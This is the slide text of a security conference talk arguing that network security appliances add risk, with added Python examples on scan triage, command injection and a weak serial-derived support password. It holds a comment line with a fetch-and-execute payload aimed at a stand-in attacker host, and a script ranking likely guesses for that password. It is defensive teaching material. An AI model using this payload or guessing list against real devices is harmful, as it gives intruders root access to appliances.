Addition by Subtraction: How Networked Devices Affect your Security
Chris Campbell
BSidesPR
TL;DR
Network security can be improved by removing security appliances and other devices which introduce unnecessary risk.
Who am I?
Chris Campbell (@obscuresec)
Former Army Signal Officer
Security Researcher/Penetration Tester
Spoken at Derbycon, BlackHat, Shmoocon Firetalks, BsidesLV
PowerShell fan and contributor to PowerSploit
Who do I speak for?
I do not speak for anyone but myself
This research was individually conducted and should be considered free-search
Who are you?
Managers
Administrators
Auditors
Penetration Testers
Vendors
Students
Story Time
You never forget your first
Attack Diagram
Still Out There
ShodanHQ shows that they are exposed
What I Learned
Just because a product solves a security problem doesn't mean it is secure.
Anyone can find vulnerabilities.
These types of devices are a perfect place to hide from incident handlers.
Started Collecting
Remote Access Appliances
Cososys Endpoint Protector
McAfee Email and Web Gateway
EdgeWave Iprism Web Proxy
ForeScout Counteract
Barracuda Spam & Virus Firewall
Servgate Edgeforce M30
Celestix Scorpio RAS3000
Qualys Qualysguard Scanner
Bluelane Patchpoint
MRV LX Series Console Server
Avaya ASG Guard Secure Access Server
Network and Monitoring Appliances
Infoblox Trinzic Network Services
Riverbed Steelhead
ManageEngine Opmanager
Alert-on-Failure (AOF) Enterprise
Mutiny Technology Mutiny Appliance
Security and Firewall Appliances
Other Appliances
Google Search Appliance
Symantec Opscenter
InfoBlox IPAM
EMC Clariion
F5 Big-IP Appliance
Procurement
Craigslist, eBay and borrowed from friends
Fully-functional demos from vendors' websites
Virtual appliance marketplace
Aren't appliances expensive?
Storage Issues
Testing a New Device
Image (backup) HDDs and RTFM
Put in lab network (isolated)
Testing
Port scan with NMAP/NSE scripts
Look for known vulnerabilities with services
Login with default credentials
Looked for ways to gain root OS privileges
Identify features that could be used by an attacker
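The port-scan and enumeration steps above produce output that has to be turned into a worklist: which ports get the default-credential attempts, which services pass credentials in the clear, and which product/version strings to search for known vulnerabilities. The following is an added example, not from the talk: it parses nmap's `-oX` XML output and sorts the open ports into those buckets. The XML is constructed to match nmap's layout for a hypothetical appliance at 10.0.0.5, and every product and version string in it is made up.

```python
"""Build the testing worklist from `nmap -sV -oX` output.  Added example,
not from the talk: the XML is constructed to match nmap's -oX layout for a
hypothetical appliance at 10.0.0.5; every product/version string in it is
made up."""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -sU -oX appliance.xml 10.0.0.5">
<host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="ftpd" version="1.0"/></port>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="5.3"/></port>
<port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.2"/></port>
<port protocol="tcp" portid="443"><state state="open"/><service name="http" product="Apache httpd" version="2.2" tunnel="ssl"/></port>
<port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
</ports></host></nmaprun>"""

# Where the checklist steps send each service (assumed groupings).
LOGIN_SURFACE = {"ssh", "telnet", "ftp", "http", "https"}   # try default credentials here
CLEARTEXT = {"ftp", "telnet", "http", "snmp"}               # credentials visible on the wire


def parse_open_ports(xml_text: str) -> list:
    """Return one dict per confirmed-open port.  Only state == "open" counts,
    so UDP "open|filtered" guesses stay out of the worklist."""
    ports = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            # nmap reports TLS-wrapped HTTP as name="http" tunnel="ssl"
            if name == "http" and svc.get("tunnel") == "ssl":
                name = "https"
            product = ""
            if svc is not None:
                product = " ".join(filter(None, (svc.get("product"), svc.get("version"))))
            ports.append({"host": addr, "port": int(port.get("portid")),
                          "proto": port.get("protocol"), "service": name,
                          "product": product})
    return ports


def triage(ports: list) -> dict:
    """Map open ports onto the checklist: default-credential targets,
    cleartext services, and product/version strings to search for known
    vulnerabilities."""
    return {
        "login_targets": [p["port"] for p in ports if p["service"] in LOGIN_SURFACE],
        "cleartext": [p["port"] for p in ports if p["service"] in CLEARTEXT],
        "version_lookups": [(p["port"], p["product"]) for p in ports if p["product"]],
    }


if __name__ == "__main__":
    for key, val in triage(parse_open_ports(SAMPLE_NMAP_XML)).items():
        print(f"{key}: {val}")
```

The groupings are a starting point for an isolated lab, not a verdict: the version lookups still have to be run against a vulnerability database by hand, and a port that nmap marks closed today may be opened by a feature you enable later.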
Before we move on, let's get real!
Your enterprise goes from this
To this
With 1 of these
Reasons to Attack Appliances/Devices
Powerful Linux OS
Ability to leverage Python, Lua, Ruby and Bash
Tools like Netcat, Nmap, TCPDump and others
Privileged network segment
Difficult IR environment
Admins probably don't even have root access
Best place to persist in an enterprise
What is an appliance?
Could be virtualized, but typically:
Out-dated server hardware (cheap)
Open-Source Operating System (Linux)
A few security tools
Web Application to manage and audit
Why your boss buys them
blocks both known and unknown attacks with 100% accuracy.
provides complete security protection against all attacks.
protected against compromise by any potential attackers.
operates without human intervention or manual updates.
Example 1: Network Monitoring
Examine Open Ports
SSH is open, but we don't know the root password
HTTP has default passwords
Where to find the default password?
What if I change the password?
Backdoor accounts with default passwords
Many appliances limit length and complexity
Lots of tools to brute-force (e.g. Fireforce)
Custom dictionaries are effective
Now What?
Easiest vuln to find is Cmd Injection
Commonly in troubleshooting utilities
Great for persistence on RO file systems
But how do you get Root?
Use Curl to pull down payload and execute
Since webapp is running as root we can
Thanks Juan!
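The command injection described in Example 1 comes from one pattern: a troubleshooting form (ping, traceroute, nslookup) whose field is pasted into a shell command line by a web application that runs as root. The following added example, which is not code from the talk or from any product on the slides, shows that pattern beside its fix. The handler names and the payload are assumptions, and the base command is `echo` rather than `ping` so the script runs offline; the injection behaves the same way.

```python
"""Command injection in an appliance troubleshooting page, and the fix.
Added example; the handler, names and payload are assumptions, not code
from any product on the slides.  The base command is `echo` instead of
`ping` so the script runs offline; the injection behaves the same."""
import ipaddress
import re
import subprocess

BASE_CMD = "echo"   # stand-in for ping / traceroute / nslookup


# --- vulnerable pattern: form field pasted into one shell string ----------
def vulnerable_ping(target: str) -> str:
    # Typical of troubleshooting CGIs; runs as the webapp's user, often root.
    # A target such as "10.0.0.1; curl http://attacker.example/p.sh | sh"
    # (hypothetical URL) would fetch and run a payload, as in the talk.
    cmd = f"{BASE_CMD} -c 3 {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# --- hardened: allow-list the input, pass argv, never invoke a shell ------
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.IGNORECASE)


def validate_target(target: str) -> str:
    """Accept only a literal IP address or an RFC 1123 hostname."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected target: {target!r}")


def safe_argv(target: str) -> list:
    # The validated value is a single argv element: no shell ever parses it,
    # and the allow-list keeps it from starting with "-" (option injection).
    return [BASE_CMD, "-c", "3", validate_target(target)]


def hardened_ping(target: str) -> str:
    # shell=False is the default; shown explicitly.  The other half of the
    # fix is not running the web application as root in the first place.
    return subprocess.run(safe_argv(target), shell=False,
                          capture_output=True, text=True).stdout


def is_rejected(target: str) -> bool:
    try:
        validate_target(target)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("vulnerable:", vulnerable_ping(payload).strip().replace("\n", " | "))
    print("hardened rejects payload:", is_rejected(payload))
```

Blacklisting `;`, `|` and `$(` is the usual vendor "fix" and is not enough; the allow-list plus argv list removes the shell from the path entirely. On a read-only file system the injected command is also the persistence mechanism, which is why the same troubleshooting page should be checked again after every firmware update.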
Example 2: Security Appliance
Scan and Enumerate
Vulnerable FTP service running
Web interface for management
SSH is enabled but no credentials provided
Different Approach: Ask
Support Procedures
Documentation revealed that remote access was possible for remote support
Is the password static or derived?
What does it mean?
Script calculates the sum of the digits in the 10-digit serial number
91 possible outcomes (sums 0 through 90)
SSH in and sudo to root!
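A support password derived from the digit sum of a serial number collapses a 10-digit secret (ten billion serials) into 91 values, and those values are not even equally likely. The added example below, which is not the talk's script, enumerates the whole candidate space, orders it by how many serials map to each sum so that the best guesses come first under an account lockout, and reports how many attempts cover a given share of all devices. The serial used and the assumption that the sum is used as-is for the password are made up for illustration.

```python
"""How many guesses a serial-derived support password really costs.
Added example built on the scheme from Example 2 (password = sum of the
digits of a 10-digit serial); the serial below is made up and the way the
sum is formatted as a password is an assumption."""

SERIAL_DIGITS = 10


def digit_sum(serial: str) -> int:
    """The derivation the support script performs."""
    if len(serial) != SERIAL_DIGITS or not serial.isdigit():
        raise ValueError("expected a 10-digit numeric serial")
    return sum(int(ch) for ch in serial)


def sum_distribution(ndigits: int = SERIAL_DIGITS) -> list:
    """counts[s] = number of ndigits-digit serials whose digit sum is s.
    Built by convolving the uniform 0..9 digit distribution ndigits times;
    len(counts) is 9*ndigits + 1, i.e. 91 for a 10-digit serial."""
    counts = [1]
    for _ in range(ndigits):
        nxt = [0] * (len(counts) + 9)
        for s, c in enumerate(counts):
            for d in range(10):
                nxt[s + d] += c
        counts = nxt
    return counts


def wordlist(ndigits: int = SERIAL_DIGITS) -> list:
    """Every possible password, most-likely sum first, so a lockout after N
    attempts still leaves you with the N best guesses."""
    dist = sum_distribution(ndigits)
    return [str(s) for s in sorted(range(len(dist)), key=lambda s: -dist[s])]


def guesses_for_coverage(fraction: float, ndigits: int = SERIAL_DIGITS) -> int:
    """How many ordered guesses cover `fraction` of all serials."""
    dist = sorted(sum_distribution(ndigits), reverse=True)
    total = sum(dist)
    covered = 0
    for i, c in enumerate(dist, 1):
        covered += c
        if covered >= fraction * total:
            return i
    return len(dist)


if __name__ == "__main__":
    words = wordlist()
    print(len(words), "candidates; serial 0012345678 ->", digit_sum("0012345678"))
    print("first guesses:", words[:5])
    print("50% of serials covered in", guesses_for_coverage(0.5), "tries,",
          "90% in", guesses_for_coverage(0.9))
```

Because the sum of ten uniform digits clusters tightly around 45, a handful of guesses covers a large fraction of deployed units even where the serial is unknown; where the serial is printed on the chassis or shown in the web interface, a single attempt suffices. The same counting approach applies to any password scheme derived from a short function of public device data.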
Example 3: The Other Security
Isolate and Scan
Remote Access?
Backdoor?
Monitor the Device
Where are my passwords going?
Free Features!
I'm sure my passwords are safe.
What to do from here?
Privileged Network Location
Server segment or VLAN could be trusted
Attack enterprise with PTH-Suite
Attacks against Administrators
Full access to servers is way worse than a normal XSS
Think malicious iframes or Java applets on every page
Admins aren't browsing with elevated privileges, are they?
Keylog /capture credentials
Domain Authentication
Password reuse to other networked devices
What is better than a XSS vuln?
XSS Features!
Recommendations
Don't immediately trust the vendor
Especially those that claim to stop unknown attacks with 100% accuracy
Look at their security track record on security sites
Securityfocus, exploit-db and osvdb are a good start
No vulnerabilities disclosed != good sign
Assess your current appliances and evaluate demos of all networked devices before purchasing
Ask to see previous security test results from the vendor
Use a systematic approach but think like an attacker
Look for vulnerabilities like those documented by OWASP
Document potential vulnerabilities and share your findings
Think about how you will sanitize and dispose of the device
Recommendations (2)
Segment them from your enterprise
Many organizations drown in data from continuous monitoring
Eliminating unfamiliar and untested architectures could improve your overall posture: if you don't need them, get rid of them
Train yourself and your team
Do internal training (e.g. brown-bag lunches)
Attend and participate in security conferences like Blackhat and Bsides
Read security blogs
Demand control
Ask if the vendor gives you root control before purchasing
Ask how the appliance stores passwords
If they don't, don't buy it
Until we make real security a financial priority, vendors won't fix
What did you do with that hardware?
Questions?
@obscuresec
www.obscuresec.com
Thanks to Matt, Josh, Juan, Carlos, Skip & the whole BsidesPR crew!